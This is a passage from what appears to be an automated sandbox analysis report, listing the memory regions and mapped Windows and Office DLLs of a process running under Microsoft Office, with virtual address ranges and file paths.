0xe68bcb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68bcb0000" filename = "" Region: id = 4451 start_va = 0x7fff87ae0000 end_va = 0x7fff889ccfff entry_point = 0x7fff87ae0000 region_type = mapped_file name = "mso98win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso98win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso98win32client.dll") Region: id = 4452 start_va = 0x7fff8c440000 end_va = 0x7fff8c519fff entry_point = 0x7fff8c440000 region_type = mapped_file name = "mso50win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso50win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso50win32client.dll") Region: id = 4455 start_va = 0xe68bcc0000 end_va = 0xe68bcc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68bcc0000" filename = "" Region: id = 4456 start_va = 0x7fff83100000 end_va = 0x7fff84dfffff entry_point = 0x7fff83100000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll") Region: id = 4457 start_va = 0x733f0000 end_va = 0x7377bfff entry_point = 0x733f0000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 4458 start_va = 0x73930000 end_va = 0x73937fff entry_point = 0x73930000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4459 start_va = 0xe68bcd0000 end_va = 0xe68bcd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68bcd0000" filename = "" Region: id = 4460 start_va = 0xe68bd20000 end_va = 0xe68be1ffff entry_point = 0x0 region_type = private name = "private_0x000000e68bd20000" filename = "" Region: id = 4461 start_va = 0x7ff6da988000 end_va = 0x7ff6da989fff entry_point = 0x0 region_type = private name = "private_0x00007ff6da988000" filename = "" Region: id = 4462 start_va = 0x7fff92c00000 end_va = 0x7fff92c09fff entry_point = 0x7fff92c00000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4463 start_va = 0x7fff92e90000 end_va = 0x7fff931ccfff entry_point = 0x7fff92e90000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 4471 start_va = 0x72f60000 end_va = 0x733e7fff entry_point = 0x72f60000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 4472 start_va = 0xe68be20000 end_va = 0xe68c040fff entry_point = 0xe68be20000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 4473 start_va = 0x7fff95aa0000 end_va = 0x7fff95fe4fff entry_point = 0x7fff95aa0000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 4477 start_va = 0x73a60000 end_va = 0x73aa3fff entry_point = 0x73a60000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 4478 start_va = 0x7fff9b950000 end_va = 0x7fff9b9a7fff entry_point = 0x7fff9b950000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4479 start_va = 0x72ee0000 end_va = 0x72f5dfff entry_point = 0x72ee0000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 4480 start_va = 0x7fff99910000 end_va = 0x7fff999abfff entry_point = 0x7fff99910000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 4502 start_va = 0x72cf0000 end_va = 0x72edffff entry_point = 0x72cf0000 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 4503 start_va = 0xe68bce0000 end_va = 0xe68bcf2fff entry_point = 0xe68bce0000 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 4504 start_va = 0xe68c050000 end_va = 0xe68c547fff entry_point = 0xe68c050000 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uires.dll") Region: id = 4505 start_va = 0xe68c550000 end_va = 0xe68d348fff entry_point = 0xe68c550000 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lres.dll") Region: id = 4506 start_va = 0xe68d350000 end_va = 0xe691a41fff entry_point = 0xe68d350000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msores.dll") Region: id = 4507 start_va = 0xe691a50000 end_va = 0xe691acffff entry_point = 0x0 region_type = private name = "private_0x000000e691a50000" filename = "" Region: id = 4508 start_va = 0xe691ad0000 end_va = 0xe691b4ffff entry_point = 0x0 region_type = private name = "private_0x000000e691ad0000" filename = "" Region: id = 4509 start_va = 0xe691b50000 end_va = 0xe691d4ffff entry_point = 0x0 region_type = private name = "private_0x000000e691b50000" filename = "" Region: id = 4510 start_va = 0xe691e80000 end_va = 0xe691e8ffff entry_point = 0x0 region_type = private name = "private_0x000000e691e80000" filename = "" Region: id = 4511 start_va = 0xe691e90000 end_va = 0xe69203bfff entry_point = 0xe691e90000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 4512 start_va = 0x7ff6da983000 end_va = 0x7ff6da984fff entry_point = 0x0 region_type = private name = "private_0x00007ff6da983000" filename = "" Region: id = 4513 start_va = 0x7ff6da986000 end_va = 0x7ff6da987fff entry_point = 0x0 region_type = private name = "private_0x00007ff6da986000" filename = "" Region: id = 4514 start_va = 0x7fff5e1b0000 end_va = 0x7fff5e1bffff entry_point = 0x0 region_type = private name = "private_0x00007fff5e1b0000" filename = "" Region: id = 4515 start_va = 0x7fff94040000 end_va = 0x7fff94298fff entry_point = 0x7fff94040000 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 4516 start_va = 0x7fff9df80000 end_va = 0x7fff9dfb5fff entry_point = 0x7fff9df80000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4517 start_va = 0x7fff9e2e0000 end_va = 0x7fff9e43bfff entry_point = 0x7fff9e2e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4522 start_va = 0x72ad0000 end_va = 0x72ce2fff entry_point = 0x72ad0000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 4523 start_va = 0xe691d50000 end_va = 0xe691dcffff entry_point = 0x0 region_type = private name = "private_0x000000e691d50000" filename = "" Region: id = 4524 start_va = 0x7ff6da85e000 end_va = 0x7ff6da85ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6da85e000" filename = "" Region: id = 4525 start_va = 0x7fff999b0000 end_va = 0x7fff99c52fff entry_point = 0x7fff999b0000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 4526 start_va = 0x728b0000 end_va = 0x72ac7fff entry_point = 0x728b0000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 4527 start_va = 0x7fff996a0000 end_va = 0x7fff9990dfff entry_point = 0x7fff996a0000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 4540 start_va = 0x738b0000 end_va = 0x738bafff entry_point = 0x738b0000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 4541 start_va = 0x738c0000 end_va = 0x738d9fff entry_point = 0x738c0000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 4542 start_va = 0xe691dd0000 end_va = 0xe691df9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e691dd0000" filename = "" Region: id = 4543 start_va = 0xe691e00000 end_va = 0xe691e00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e691e00000" filename = "" Region: id = 4544 start_va = 0xe691e10000 end_va = 0xe691e10fff entry_point = 0x0 region_type = private name = "private_0x000000e691e10000" filename = "" Region: id = 4545 start_va = 0xe691e20000 end_va = 0xe691e20fff entry_point = 0x0 region_type = private name = "private_0x000000e691e20000" filename = "" Region: id = 4546 start_va = 0xe691e30000 end_va = 0xe691e30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e691e30000" filename = "" Region: id = 4547 start_va = 0xe692040000 end_va = 0xe69213ffff entry_point = 0x0 region_type = private name = "private_0x000000e692040000" filename = "" Region: id = 4548 start_va = 0xe692140000 end_va = 0xe6921bffff entry_point = 0x0 region_type = private name = "private_0x000000e692140000" filename = "" Region: id = 4549 start_va = 0xe6921c0000 end_va = 0xe69223ffff entry_point = 0x0 region_type = private name = "private_0x000000e6921c0000" filename = "" Region: id = 4550 start_va = 0xe692240000 end_va = 0xe6922bffff entry_point = 0x0 region_type = private name = "private_0x000000e692240000" filename = "" Region: id = 4551 start_va = 0xe6922c0000 end_va = 0xe6923bffff entry_point = 0x0 region_type = private name = "private_0x000000e6922c0000" filename = "" Region: id = 4552 start_va = 0xe6923c0000 end_va = 0xe69243ffff entry_point = 0x0 region_type = private name = "private_0x000000e6923c0000" filename = "" Region: id = 4553 start_va = 0x7ff6da854000 end_va = 0x7ff6da855fff entry_point = 0x0 region_type = private name = "private_0x00007ff6da854000" filename = "" Region: id = 4554 start_va = 0x7ff6da856000 end_va = 0x7ff6da857fff entry_point = 0x0 region_type = private name = "private_0x00007ff6da856000" filename = "" Region: id = 4555 start_va = 0x7ff6da858000 end_va = 0x7ff6da859fff entry_point = 0x0 region_type = private name = "private_0x00007ff6da858000" filename = "" Region: id = 4556 start_va = 0x7ff6da85a000 end_va = 0x7ff6da85bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6da85a000" filename = "" Region: id = 4557 start_va = 0x7ff6da85c000 end_va = 0x7ff6da85dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6da85c000" filename = "" Region: id = 4558 start_va = 0x7fff95a30000 end_va = 0x7fff95a3bfff entry_point = 0x7fff95a30000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 4559 start_va = 0x7fff98080000 end_va = 0x7fff9809ffff entry_point = 0x7fff98080000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 4560 start_va = 0x7fff9f110000 end_va = 0x7fff9f1b4fff entry_point = 0x7fff9f110000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4561 start_va = 0xe691e40000 end_va = 0xe691e40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e691e40000" filename = "" Region: id = 4562 start_va = 0x7fff942a0000 end_va = 0x7fff942defff entry_point = 0x7fff942a0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4563 start_va = 0x7fff9e440000 end_va = 0x7fff9e447fff entry_point = 0x7fff9e440000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4564 start_va = 0xe691e50000 end_va = 0xe691e50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e691e50000" filename = "" Region: id = 4565 start_va = 0x7fff9b460000 end_va = 0x7fff9b476fff entry_point = 0x7fff9b460000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4566 start_va = 0x7fff9b0b0000 end_va = 0x7fff9b0e2fff entry_point = 0x7fff9b0b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4567 start_va = 0x74610000 end_va = 0x74619fff entry_point = 0x74610000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4568 start_va = 0x7fff9b5d0000 end_va = 0x7fff9b5dafff entry_point = 0x7fff9b5d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4569 start_va = 0xe692440000 end_va = 0xe6924bffff entry_point = 0x0 region_type = private name = "private_0x000000e692440000" filename = "" Region: id = 4570 start_va = 0x7ff6da852000 end_va = 0x7ff6da853fff entry_point = 0x0 region_type = private name = "private_0x00007ff6da852000" filename = "" Region: id = 4571 start_va = 0x7fff93790000 end_va = 0x7fff9379dfff entry_point = 0x7fff93790000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4714 start_va = 0x73da0000 end_va = 0x73e46fff entry_point = 0x73da0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 4715 start_va = 0x7fff95940000 end_va = 0x7fff95a15fff entry_point = 0x7fff95940000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4716 start_va = 0x7fff9eea0000 end_va = 0x7fff9eea6fff entry_point = 0x7fff9eea0000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 4717 start_va = 0x73e50000 end_va = 0x73e57fff entry_point = 0x73e50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 4718 start_va = 0x73e60000 end_va = 0x73e8ffff entry_point = 0x73e60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 4719 start_va = 0x7fff99270000 end_va = 0x7fff9927afff entry_point = 0x7fff99270000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4720 start_va = 0x7fff99290000 end_va = 0x7fff992c7fff entry_point = 0x7fff99290000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4721 start_va = 0x73870000 end_va = 0x73882fff entry_point = 0x73870000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 4722 start_va = 0x7fff97bb0000 end_va = 0x7fff97bc5fff entry_point = 0x7fff97bb0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4723 start_va = 0x7fff9eeb0000 end_va = 0x7fff9ef18fff entry_point = 0x7fff9eeb0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4724 start_va = 0x73820000 end_va = 0x73833fff entry_point = 0x73820000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 4725 start_va = 0x7fff96880000 end_va = 0x7fff96899fff entry_point = 0x7fff96880000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4726 start_va = 0x7fff93a50000 end_va = 0x7fff93a64fff entry_point = 0x7fff93a50000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 4727 start_va = 0x74180000 end_va = 0x74440fff entry_point = 0x74180000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 4728 start_va = 0x74450000 end_va = 0x745affff entry_point = 0x74450000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 4729 start_va = 0x7fff93db0000 end_va = 0x7fff93f46fff entry_point = 0x7fff93db0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 4730 start_va = 0x7fff964d0000 end_va = 0x7fff96845fff entry_point = 0x7fff964d0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4731 start_va = 0x74620000 end_va = 0x7463dfff entry_point = 0x74620000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4732 start_va = 0x7fff9b7b0000 end_va = 0x7fff9b7dbfff entry_point = 0x7fff9b7b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4733 start_va = 0x73f30000 end_va = 0x74153fff entry_point = 0x73f30000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 4734 start_va = 0xe691e60000 end_va = 0xe691e60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e691e60000" filename = "" Region: id = 4735 start_va = 0x7fff92950000 end_va = 0x7fff92bf6fff entry_point = 0x7fff92950000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 4737 start_va = 0xe691e70000 end_va = 0xe691e70fff entry_point = 0xe691e70000 region_type = mapped_file name = "counters.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 4738 start_va = 0x7fff9b400000 end_va = 0x7fff9b45cfff entry_point = 0x7fff9b400000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4739 start_va = 0x73cc0000 end_va = 0x73d43fff entry_point = 0x73cc0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 4740 start_va = 0x7fff9b200000 end_va = 0x7fff9b2a7fff entry_point = 0x7fff9b200000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4741 start_va = 0x72840000 end_va = 0x728a7fff entry_point = 0x72840000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 4742 start_va = 0x7fff93600000 end_va = 0x7fff9367ffff entry_point = 0x7fff93600000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 4743 start_va = 0xe6924c0000 end_va = 0xe6924c4fff entry_point = 0xe6924c0000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 4744 start_va = 0xe6924d0000 end_va = 0xe6924dffff entry_point = 0xe6924d0000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 4797 start_va = 0xe6924e0000 end_va = 0xe692795fff entry_point = 0xe6924e0000 region_type = mapped_file name = "mapir.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MAPIR.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mapir.dll") Region: id = 4798 start_va = 0xe6927a0000 end_va = 0xe69289ffff entry_point = 0x0 region_type = private name = "private_0x000000e6927a0000" filename = "" Region: id = 4799 start_va = 0xe6928a0000 end_va = 0xe69309ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e6928a0000" filename = "" Region: id = 4800 start_va = 0xe6930a0000 end_va = 0xe6930a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e6930a0000" filename = "" Region: id = 4801 start_va = 0xe6930b0000 end_va = 0xe6930b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e6930b0000" filename = "" Region: id = 4802 start_va = 0x7fff969b0000 end_va = 0x7fff96a17fff entry_point = 0x7fff969b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4803 start_va = 0x7fff94e00000 end_va = 0x7fff94e09fff entry_point = 0x7fff94e00000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4804 start_va = 0xe6930c0000 end_va = 0xe69313ffff entry_point = 0x0 region_type = private name = "private_0x000000e6930c0000" filename = "" Region: id = 4805 start_va = 0xe693140000 end_va = 0xe69393ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e693140000" filename = "" Region: id = 4806 start_va = 0xe693940000 end_va = 0xe693a40fff entry_point = 0x0 region_type = private name = "private_0x000000e693940000" filename = "" Region: id = 4807 start_va = 0x7ff6da850000 end_va = 0x7ff6da851fff entry_point = 0x0 region_type = private name = "private_0x00007ff6da850000" filename = "" Region: id = 4808 start_va = 0x7fff9af30000 end_va = 0x7fff9af61fff entry_point = 0x7fff9af30000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4814 start_va = 0xe693940000 end_va = 0xe693942fff entry_point = 0xe693940000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 4815 start_va = 0x7fff9af90000 end_va = 0x7fff9b003fff entry_point = 0x7fff9af90000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 4816 start_va = 0x7fff9bc20000 end_va = 0x7fff9bc30fff entry_point = 0x7fff9bc20000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4817 start_va = 0x7fff9c2c0000 end_va = 0x7fff9c480fff entry_point = 0x7fff9c2c0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4818 start_va = 0x7fff82b40000 end_va = 0x7fff82e4afff entry_point = 0x7fff82b40000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\riched20.dll") Region: id = 4821 start_va = 0xe693950000 end_va = 0xe693951fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e693950000" filename = "" Region: id = 4822 start_va = 0x7fff91710000 end_va = 0x7fff91723fff entry_point = 0x7fff91710000 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 4823 start_va = 0x7fff9b660000 end_va = 0x7fff9b695fff entry_point = 0x7fff9b660000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 4824 start_va = 0x7fff9b6a0000 end_va = 0x7fff9b6c5fff entry_point = 0x7fff9b6a0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4825 start_va = 0x7fff92280000 end_va = 0x7fff9229efff entry_point = 0x7fff92280000 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 4826 start_va = 0xe693140000 end_va = 0xe693149fff entry_point = 0xe693140000 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 4827 start_va = 0xe693150000 end_va = 0xe69324ffff entry_point = 0x0 region_type = private name = "private_0x000000e693150000" filename = "" Region: id = 4828 start_va = 0xe693960000 end_va = 0xe693960fff entry_point = 0x0 region_type = private name = "private_0x000000e693960000" filename = "" Region: id = 4829 start_va = 0x7ff6da84e000 end_va = 0x7ff6da84ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6da84e000" filename = "" Region: id = 4838 start_va = 0xe6928a0000 end_va = 0xe692c9ffff entry_point = 0x0 region_type = private name = "private_0x000000e6928a0000" filename = "" Region: id = 4839 start_va = 0x7fff9ab10000 end_va = 0x7fff9ab32fff entry_point = 0x7fff9ab10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4840 start_va = 0x73920000 end_va = 0x73927fff entry_point = 0x73920000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 4841 start_va = 